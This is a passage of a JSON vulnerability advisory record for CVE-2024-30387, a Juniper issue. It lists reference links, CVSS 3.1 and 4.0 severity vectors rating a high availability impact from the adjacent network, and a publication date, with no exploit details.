"published": "2024-04-12T18:33:26Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-30387"
},
{
"type": "WEB",
"url": "https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L"
},
{
"type": "WEB",
"url": "https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
},
{
"type": "WEB",
"url": "http://supportportal.juniper.net/JSA79187"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
"type": "CVSS_V4"
}
]
}
No mitigation information available for this CWE.
No CAPEC attack patterns related to this CWE.